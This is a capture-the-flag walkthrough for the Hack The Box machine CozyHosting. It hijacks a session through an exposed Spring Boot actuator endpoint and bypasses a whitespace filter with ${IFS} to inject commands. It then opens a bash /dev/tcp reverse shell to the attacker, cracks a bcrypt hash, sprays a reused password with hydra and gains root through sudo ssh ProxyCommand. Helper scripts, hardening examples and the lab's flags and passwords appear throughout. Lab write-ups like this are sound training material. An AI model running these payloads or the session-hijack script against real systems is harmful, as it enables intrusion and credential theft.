Contents
Connecting to the HTB server and starting the target
1. How many TCP ports are open on CozyHosting?
2. The webserver on TCP port 80 issues a redirect to what domain?
3. What relative path on the webserver returns a 500 error?
4. What is the Java web framework used in the web application?
5. What endpoint is exposed in Spring Boot and is mainly used for debugging purposes?
6. What is the username of the user whose session is exposed?
7. When a POST request is sent to /executessh, which of the two parameters is vulnerable to command injection?
Intercepting the request with Yakit and replacing the Cookie value
8. What user is the web application running as?
9. What is the full path to the Java file that runs the web application?
10. What is the name of the file where application-related properties are stored in a Spring Boot application?
11. What is the admin user's password for the web application?
12. Submit the flag located in the josh user's home directory.
USER_FLAG: 6119fa773d0ffd27c4dd189fc0f5d9d5
13. What is the full path of the binary that the josh user can execute on the machine as root?
14. Submit the flag located in the root user's home directory.
ROOT_FLAG: d2d1cf194e12a9002e66e87f61e53579
Connecting to the HTB server and starting the target
Target IP: 10.10.11.230
Assigned attacker IP: 10.10.16.22
1. How many TCP ports are open on CozyHosting?
Run a quick scan of the target's open ports with fscan
fscan -nopoc -nobr -no -h {TARGET_IP}
┌──(root㉿kali)-[/home/kali/Desktop]
└─# fscan -nopoc -nobr -no -h 10.10.11.230
fscan version: 1.8.4
start infoscan
10.10.11.230:80 open
10.10.11.230:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.10.11.230 code:301 len:178 title:301 Moved Permanently redirect url: http://cozyhosting.htb
done 2/2
[*] scan finished, elapsed: 736.313668ms
The scan shows two open TCP ports on the target: 22 and 80.
2. The webserver on TCP port 80 issues a redirect to what domain?
Request port 80 on the target with curl and look at the response headers
curl -I http://{TARGET_IP}:80
┌──(root㉿kali)-[/home/kali/Desktop]
└─# curl -I http://10.10.11.230:80
HTTP/1.1 301 Moved Permanently
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 24 Oct 2024 07:41:30 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: http://cozyhosting.htb
The Location header shows that port 80 redirects to the domain cozyhosting.htb.
3. What relative path on the webserver returns a 500 error?
Add the IP and domain to /etc/hosts so the name resolves locally
echo "{TARGET_IP} cozyhosting.htb" >> /etc/hosts
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat /etc/hosts
127.0.0.1 kali
10.10.11.230 cozyhosting.htb
Fuzz paths under the domain
ffuf -u http://cozyhosting.htb/FUZZ -w common.txt
┌──(root㉿kali)-[/home/kali/Desktop/dictionary]
└─# ffuf -u http://cozyhosting.htb/FUZZ -w common.txt
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://cozyhosting.htb/FUZZ
:: Wordlist : FUZZ: /home/kali/Desktop/dictionary/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 12706, Words: 4263, Lines: 285, Duration: 100ms]
admin [Status: 401, Size: 97, Words: 1, Lines: 1, Duration: 95ms]
error [Status: 500, Size: 73, Words: 1, Lines: 1, Duration: 80ms]
index [Status: 200, Size: 12706, Words: 4263, Lines: 285, Duration: 81ms]
login [Status: 200, Size: 4431, Words: 1718, Lines: 97, Duration: 101ms]
logout [Status: 204, Size: 0, Words: 1, Lines: 1, Duration: 75ms]
:: Progress: [4614/4614] :: Job [1/1] :: 404 req/sec :: Duration: [0:00:13] :: Errors: 0 ::
The output shows that the relative path /error answers with status 500.
4. What is the Java web framework used in the web application?
Open the target's /error path in a browser
Searching for the keyword "Whitelabel Error Page" shows that this is the default error page of Spring Boot, so the web application is built on Spring Boot.
5. What endpoint is exposed in Spring Boot and is mainly used for debugging purposes?
Knowing the application runs on Spring Boot, fuzz the paths again with the matching wordlist
ffuf -u http://cozyhosting.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/spring-boot.txt
The output shows the /actuator endpoint, under which a set of management and debugging sub-paths are exposed.
6. What is the username of the user whose session is exposed?
Open /actuator/sessions on the target in a browser
The exposed session belongs to the user kanderson.
7. When a POST request is sent to /executessh, which of the two parameters is vulnerable to command injection?
Use the session ID obtained from the /actuator/sessions output above as the cookie for a request to the /admin path
Intercept the request with Yakit and replace the Cookie value with the exposed session ID
This lands on the Admin Dashboard
Scrolling down reveals the connection settings panel
Write a reverse-shell script locally for the target to fetch and execute. The callback address must be the attacker's IP (10.10.16.22 here), not the target's:
echo "bash -i >& /dev/tcp/{ATTACKER_IP}/1425 0>&1" > reverse_shell.sh
Serve the script over HTTP from the attacker machine and have the target fetch and run it through the injected command. ${IFS} is used in place of spaces, because the web application rejects whitespace in the field.
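The session theft in steps 6 and 7 (read /actuator/sessions, take a live session ID, present it as the cookie on /admin) can be scripted instead of done by hand in Yakit. The following is an added example, not code from the original writeup: the JSON shape is the documented output of Spring Boot's `sessions` actuator endpoint, the sample document is constructed here so the parsing runs offline, and the network part assumes the target base URL and Spring Boot's default cookie name JSESSIONID.

```python
#!/usr/bin/env python3
"""Pull exposed Spring Session IDs from /actuator/sessions and replay one against /admin.

Added example, not code from the original writeup. The JSON layout is the
documented output of Spring Boot's `sessions` actuator endpoint; the sample
document below is constructed so the parsing runs offline. The HTTP part at
the bottom assumes the target base URL and that the session cookie is named
JSESSIONID (Spring Boot's default).
"""
import json
import urllib.error
import urllib.request
from typing import List, Optional

# Constructed sample of what GET /actuator/sessions returns (not captured from
# the target): one live session for kanderson and one that has already expired.
SAMPLE_SESSIONS = json.dumps({
    "sessions": [
        {"id": "AAAA1111BBBB2222", "attributeNames": ["SPRING_SECURITY_CONTEXT"],
         "principal": "kanderson", "creationTime": "2024-10-24T07:40:00Z",
         "lastAccessedTime": "2024-10-24T07:41:00Z", "maxInactiveInterval": 300,
         "expired": False},
        {"id": "CCCC3333DDDD4444", "attributeNames": [],
         "principal": "kanderson", "creationTime": "2024-10-24T06:00:00Z",
         "lastAccessedTime": "2024-10-24T06:01:00Z", "maxInactiveInterval": 300,
         "expired": True},
    ]
})


def exposed_principals(body: str) -> List[str]:
    """Usernames whose sessions the endpoint leaks (the answer to question 6)."""
    return sorted({s["principal"] for s in json.loads(body)["sessions"]})


def live_session_id(body: str, principal: str) -> Optional[str]:
    """Pick a non-expired session ID for the given user, or None if there is none."""
    for s in json.loads(body)["sessions"]:
        if s["principal"] == principal and not s.get("expired", False):
            return s["id"]
    return None


def cookie_header(session_id: str, name: str = "JSESSIONID") -> str:
    """Build the Cookie header value that replaces the one intercepted in Yakit."""
    return f"{name}={session_id}"


def hijack(base_url: str, session_id: str) -> int:
    """Replay the stolen session against /admin and return the HTTP status.

    Network call; only used from the __main__ block below. 200 means the
    server accepted the stolen session, 401 means it did not.
    """
    req = urllib.request.Request(f"{base_url}/admin",
                                 headers={"Cookie": cookie_header(session_id)})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


if __name__ == "__main__":
    target = "http://cozyhosting.htb"  # assumed; matches the hosts entry added above
    live = urllib.request.urlopen(f"{target}/actuator/sessions", timeout=10).read().decode()
    for user in exposed_principals(live):
        sid = live_session_id(live, user)
        print(user, sid, hijack(target, sid) if sid else "no live session")
```

Note that the session timeout in this application is short (5 minutes, as the properties file later shows), so an exposed ID is only useful while the victim is active; the script therefore skips sessions the endpoint already marks as expired.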
The local nc listener receives the callback
┌──(root㉿kali)-[/home/kali/Desktop/dictionary]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.230] 46290
bash: cannot set terminal process group (1063): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$ whoami
whoami
app
The payload was delivered through the Username field, and the whitespace check that ${IFS} works around applies to that field, so the parameter vulnerable to command injection is username. The panel builds an SSH command from the two values, which is how an unescaped username reaches a shell.
8. What user is the web application running as?
Run whoami in the shell received by nc:
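The failure mode behind this question is worth seeing side by side: a blacklist on spaces, a command string assembled by concatenation, and a shell to run it. The block below is an added example that models that pattern and its fix; it is not the application's decompiled code. `echo` stands in for the real `ssh` invocation so the demo runs anywhere with /bin/sh, and the allowlist regexes in the hardened version are an assumed policy, not one taken from the target.

```python
#!/usr/bin/env python3
"""Why a whitespace blacklist does not stop shell injection, and what does.

Added example modelling the /executessh pattern; not the application's own
code. `echo` replaces the real `ssh` command so this runs offline, and the
allowlist regexes are an assumed policy.
"""
import re
import subprocess

USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")   # assumed allowlist
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")           # assumed allowlist


def vulnerable_execute(username: str, host: str) -> str:
    """Blacklist on spaces, string concatenation, then a shell: injectable."""
    if " " in username:
        raise ValueError("Username can't contain whitespaces!")
    cmd = f"echo connecting to {username}@{host}"   # the real app runs ssh here
    return subprocess.run(["/bin/sh", "-c", cmd],
                          capture_output=True, text=True).stdout


def hardened_execute(username: str, host: str) -> str:
    """Allowlist both inputs and pass them as argv; no shell re-parses them."""
    if not USERNAME_RE.match(username):
        raise ValueError("invalid username")
    if not HOST_RE.match(host):
        raise ValueError("invalid host")
    argv = ["echo", "connecting", "to", f"{username}@{host}"]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


def rejected_by_hardened(username: str, host: str) -> bool:
    """True if the hardened version refuses the input before running anything."""
    try:
        hardened_execute(username, host)
    except ValueError:
        return True
    return False


def ifs_payload(command: str) -> str:
    """Encode a command so it passes the whitespace blacklist.

    The check runs on the literal string, which contains no space. The shell
    then expands ${IFS} to its field separator and splits on it, so
    `echo${IFS}x` executes as `echo x`. The leading and trailing `;` close
    off whatever the application put before and after the username.
    """
    return ";" + command.replace(" ", "${IFS}") + ";"


if __name__ == "__main__":
    payload = ifs_payload("echo INJECTED")
    print(vulnerable_execute(payload, "127.0.0.1"))     # prints INJECTED on its own line
    print("hardened rejected it:", rejected_by_hardened(payload, "127.0.0.1"))
```

The vulnerable path also reports `sh: @127.0.0.1: not found` on stderr, which is the kind of error leakage that confirms a shell is parsing the field during blind testing.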
app@cozyhosting:/app$ whoami
whoami
app
The output shows the current user is app.
9. What is the full path to the Java file that runs the web application?
List the files in the current directory
ls
Print the current directory
pwd
The jar sits in the current directory, so its full path is /app/cloudhosting-0.0.1.jar.
10. What is the name of the file where application-related properties are stored in a Spring Boot application?
A quick search answers this: application.properties
Locate the file on the system
find / -name 'application.properties' 2>/dev/null
app@cozyhosting:/app$ find / -name 'application.properties' 2>/dev/null
find / -name 'application.properties' 2>/dev/null
/tmp/app/BOOT-INF/classes/application.properties
11. What is the admin user's password for the web application?
Read the Spring Boot properties file
cat /tmp/app/BOOT-INF/classes/application.properties
app@cozyhosting:/app$ cat /tmp/app/BOOT-INF/classes/application.properties
cat /tmp/app/BOOT-INF/classes/application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
The last lines are the PostgreSQL database credentials, stored in cleartext inside the jar
User: postgres
Password: Vg&nvzAQ7XxR
Upgrade to a proper tty
python3 -c 'import pty; pty.spawn("/bin/bash")'
Connect to the database from inside the target (the datasource URL points at localhost:5432)
psql -h localhost -U postgres
List all databases
\list
Connect to the cozyhosting database
\connect cozyhosting
List the tables
\dt
Dump every column of the users table
SELECT * FROM users;
This yields the password hashes of the kanderson and admin users
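Two things in this file made the foothold possible: the `sessions` actuator endpoint was exposed to the network, and the database password was committed into the jar for any local user to read. The fragment below is an added example of the corrected settings, not the target's configuration; the `${DB_USER}`/`${DB_PASSWORD}` placeholders are Spring Boot's standard way of reading a property from the environment, and the dedicated account name is an assumption.

```properties
# application.properties, hardened (added example; the original values are the ones dumped above)
server.address=127.0.0.1
server.servlet.session.timeout=5m
# Expose only the health probe. sessions leaks live session IDs, env leaks
# configuration, beans and mappings leak the internal structure of the app.
management.endpoints.web.exposure.include=health
management.endpoint.sessions.enabled=false
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
# Read credentials from the environment instead of shipping them in the jar,
# and use a least-privilege application role rather than the postgres superuser.
spring.datasource.username=${DB_USER:cozyhosting_app}
spring.datasource.password=${DB_PASSWORD}
```

The environment of a running Spring Boot process is still readable by the user the service runs as, so this does not protect the password from someone who already has a shell as `app`; it stops the credential from travelling with every copy of the artifact.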
admin:$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm
kanderson:$2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim
Identify the hash type
hashid '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# hashid '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'
Analyzing '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt
The hashcat mode reference lists 3200 as bcrypt
Write the kanderson and admin hashes into the files hash1 and hash2 respectively
echo '$2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim' > hash1
echo '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm' > hash2
Crack the admin hash with hashcat in mode 3200 against rockyou.txt (the mode and wordlist are visible in the session summary below). bcrypt at cost 10 runs at only a few dozen hashes per second here, so a weak password is the only reason this finishes quickly:
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib...kVO8dm
Time.Started.....: Thu Oct 24 10:34:43 2024 (1 min, 5 secs)
Time.Estimated...: Thu Oct 24 10:35:48 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/kali/Desktop/dictionary/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 43 H/s (12.02ms) @ Accel:6 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2808/14344385 (0.02%)
Rejected.........: 0/2808 (0.00%)
Restore.Point....: 2772/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1024
Candidate.Engine.: Device Generator
Candidates.#1....: catcat -> keyboard
Hardware.Mon.#1..: Util: 74%
Started: Thu Oct 24 10:34:36 2024
Stopped: Thu Oct 24 10:35:49 2024
User: admin
Password: manchesterunited
12. Submit the flag located in the josh user's home directory.
Extract every username on the target
cut -d: -f 1 /etc/passwd
app@cozyhosting:/app$ cut -d: -f 1 /etc/passwd
cut -d: -f 1 /etc/passwd
root
daemon
bin
sys
sync
games
man
lp
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
_apt
systemd-network
systemd-resolve
messagebus
systemd-timesync
pollinate
sshd
syslog
uuidd
tcpdump
tss
landscape
fwupd-refresh
usbmux
lxd
app
postgres
josh
_laurel
Create a file on the attacker machine containing those usernames
Spray the recovered password across them with hydra; the password is reused by josh
hydra -L temp.txt -p manchesterunited ssh://{TARGET_IP}
Log in to josh's SSH account
ssh josh@{TARGET_IP}
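The list sprayed above has 36 names, most of them system accounts that have no login shell and can never authenticate over SSH. Trimming it first keeps the spray short and avoids tripping lockout or rate limiting on accounts that cannot succeed anyway. The block below is an added example, not part of the original writeup; the passwd excerpt is constructed from the names above with assumed UIDs and shells.

```python
#!/usr/bin/env python3
"""Reduce /etc/passwd to accounts worth spraying a reused password against.

Added example, not from the original writeup. The passwd excerpt is
constructed: the names come from the listing above, the UIDs and shells are
assumed.
"""
from typing import List

# Constructed excerpt (fields: name:x:uid:gid:gecos:home:shell)
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1001:1001::/home/app:/bin/sh
postgres:x:117:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
josh:x:1003:1003::/home/josh:/usr/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false
"""

# Shells that refuse interactive login; accounts with these cannot be sprayed.
NOLOGIN = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}


def spray_candidates(passwd: str) -> List[str]:
    """Names with a real login shell, in /etc/passwd order."""
    names = []
    for line in passwd.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:            # malformed line; skip rather than guess
            continue
        name, shell = fields[0], fields[6]
        if shell not in NOLOGIN:
            names.append(name)
    return names


def hydra_command(users_file: str, password: str, target: str) -> List[str]:
    """argv for the spray run above, limited to 4 parallel tasks as hydra
    recommends for ssh so the server does not drop connections."""
    return ["hydra", "-L", users_file, "-p", password, "-t", "4", f"ssh://{target}"]


if __name__ == "__main__":
    names = spray_candidates(SAMPLE_PASSWD)
    with open("temp.txt", "w") as f:
        f.write("\n".join(names) + "\n")
    print(" ".join(hydra_command("temp.txt", "manchesterunited", "10.10.11.230")))
```

On the real target the input would be the `cut` output's source, `/etc/passwd`, read off the box; the filter keeps root, app, postgres and josh from the constructed sample, which is the set that can actually answer an SSH password prompt.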
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ssh josh@10.10.11.230
The authenticity of host '10.10.11.230 (10.10.11.230)' can't be established.
ED25519 key fingerprint is SHA256:x/7yQ53dizlhq7THoanU79X7U63DSQqSi39NPLqRKHM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.230' (ED25519) to the list of known hosts.
josh@10.10.11.230's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Oct 24 02:45:24 PM UTC 2024
System load: 0.0048828125
Usage of /: 56.2% of 5.42GB
Memory usage: 31%
Swap usage: 0%
Processes: 246
Users logged in: 0
IPv4 address for eth0: 10.10.11.230
IPv6 address for eth0: dead:beef::250:56ff:feb9:a52d
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Oct 24 03:20:15 2024 from 10.10.16.16
josh@cozyhosting:~$ whoami
josh
Locate the user flag
find / -name 'user.txt' 2>/dev/null
Read the user flag
cat /home/josh/user.txt
josh@cozyhosting:~$ find / -name 'user.txt' 2>/dev/null
/home/josh/user.txt
josh@cozyhosting:~$ cat /home/josh/user.txt
6119fa773d0ffd27c4dd189fc0f5d9d5
USER_FLAG: 6119fa773d0ffd27c4dd189fc0f5d9d5
13. What is the full path of the binary that the josh user can execute on the machine as root?
Check which commands josh may run with elevated privileges
sudo -l
josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *
The full path of the binary is /usr/bin/ssh. The trailing wildcard means any ssh option is allowed, which is what makes the next step possible.
14. Submit the flag located in the root user's home directory.
Look up ssh on GTFOBins for the sudo escalation
The second entry (ProxyCommand) is used here. ssh hands the ProxyCommand string to the shell before it connects anywhere, so the dummy host x is never contacted; combined with the actual binary path the command is
sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
josh@cozyhosting:~$ sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# whoami
root
Locate the root flag
find / -name 'root.txt'
Read the root flag
cat /root/root.txt
# find / -name 'root.txt'
/root/root.txt
# cat /root/root.txt
d2d1cf194e12a9002e66e87f61e53579